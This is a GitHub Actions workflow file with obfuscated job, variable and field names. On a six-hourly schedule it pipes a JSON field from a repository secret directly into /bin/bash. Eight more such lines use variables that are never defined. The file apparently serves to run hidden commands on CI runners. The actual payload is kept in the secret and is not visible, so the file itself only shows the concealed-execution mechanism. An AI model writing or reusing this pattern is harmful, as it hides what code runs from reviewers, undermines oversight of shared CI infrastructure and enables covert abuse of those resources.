name: kumaozhongqin
on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kumaozhongqin
        env:
          vtlj70: ${{ secrets.vtlj70 }}
        run: |
          echo $vtlj70 | jq -r .dlx92 | /bin/bash
          echo $wvxz21 | jq -r .rqp6 | /bin/bash
          echo $abirn3 | jq -r .p91 | /bin/bash
          echo $qrqx152 | jq -r .sfhf5604 | /bin/bash
          echo $vreg27286 | jq -r .cbty66 | /bin/bash
          echo $s31804 | jq -r .f75238 | /bin/bash
          echo $ku4489 | jq -r .fy9705 | /bin/bash
          echo $fkxig58872 | jq -r .sux0511 | /bin/bash
          echo $k7 | jq -r .yonmm9837 | /bin/bash

